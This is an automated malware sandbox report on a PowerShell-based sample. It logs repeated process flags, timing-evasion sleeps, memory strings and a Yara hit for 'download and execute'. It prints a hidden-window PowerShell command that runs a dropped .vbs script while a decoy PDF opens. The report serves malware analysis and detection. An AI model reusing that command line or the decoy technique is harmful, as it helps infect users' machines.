      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5460Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4259Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6411Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3244Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 6411 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 3244 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 1476Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: svchost.exe, 0000000D.00000002.2484293170.0000022691C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW lE
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2486221710.0000022697454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7272.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7272, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
